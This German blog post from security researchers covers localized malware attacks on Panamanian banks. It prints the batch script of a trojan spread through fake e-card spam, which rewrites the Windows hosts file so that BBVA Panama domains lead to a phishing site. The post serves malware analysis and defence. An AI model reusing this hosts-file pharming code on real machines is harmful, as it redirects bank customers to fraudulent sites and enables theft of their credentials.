Verlockendes Panama

Vor kurzem waren wir in Panama, wo wir an einer Konferenz zur Cyberkriminalität in Südamerika teilgenommen haben.

Obwohl Costa Rica die höchste Internetpenetration zu verzeichnen hat, führt Panama die Länder mit den meisten erfolgreich durchgeführten Angriffen an. Aber warum ist Panama in dieser Hinsicht so reizvoll? Seine blühende Wirtschaft und eine Freihandelszone haben zur Gründung vieler Banken in diesem Land geführt. Und bei den erfolgreichen Attacken handelt es sich um Angriffe auf Banken.

In unserem Konferenzbeitrag wiesen wir darauf hin, dass Cyberattacken heute geografisch meist stark begrenzt sind – sie sind auf ein bestimmtes Land zugeschnitten, richten sich gegen eine bestimmte Gruppe in diesem Land und breiten sich in der Regel nicht über die Grenzen der entsprechenden Region oder auch nur des entsprechenden Staates hinaus aus. Diese Taktik zielt darauf ab, den Lebenszyklus des für die Attacke verwendeten Schadprogramms zu verlängern, denn lokale Attacken verringern das Entdeckungsrisiko durch Antiviren-Unternehmen.

Kurz nachdem wir aus Panama zurückgekehrt waren, brach eine dieser Attacken los. E-Mail-Anwender der Domain .pa erhielten Spam-Mails mit der Aufforderung, eine E-Card des lateinamerikanischen Services Gusanito.com zu öffnen. Klickt der User auf den Link, so lädt sich die Datei 001002003.exe auf den Opfercomputer und führt die folgenden Operationen durch:

@echo off
title AVERSINODETECTA———-HAHAHAHAHAHAHAHAHAHAHA
del c:WINDOWSsystem32driversetchosts
copy hosts c:WINDOWSsystem32driversetchosts
echo 75.127.*.* www.bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvanetpanama.com >>%windir%System32driversetchosts
exit
echo > „C:DOCUME~1ADMINI~1LOCALS~1Temptmpfile0.tmp“

Das Schadprogramm fügt der lokalen DNS-Datei einen IP-Eintrag für die BBV Panama Domain hinzu. Der Eintrag in das Titelfeld, der eine Phrase mit der Bedeutung „Vielleicht merken sie es nicht“ enthält, weist darauf hin, dass der Autor mit hoher Wahrscheinlichkeit spanisch spricht.

Ist das Angriffsopfer Kunde der Bank und versucht nun, die Website der Bank aufzurufen, wird er automatisch zu einer gefälschten Site umgeleitet, die – wie in solchen Fällen üblich – kaum von der Originalseite zu unterscheiden ist.

Wie oben bereits erwähnt, verbreiten Virenautoren ihre Machwerke nur innerhalb eines begrenzten Gebietes, um die Entdeckung durch Antiviren-Produkte so lange wie möglich hinauszuzögern. Dieser Fall zeigt, dass diese Taktik bis zu einem gewissen Grad erfolgreich ist – drei Tage nach dem Angriff, wurde das entsprechende Schadprogramm nur von 2 Antiviren-Lösungen erkannt. Eine davon war Kaspersky Anti-Virus, das den Schuldigen hinter dieser jüngsten Attacke als Trojan.Win32.Qhost.alc erkennt.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.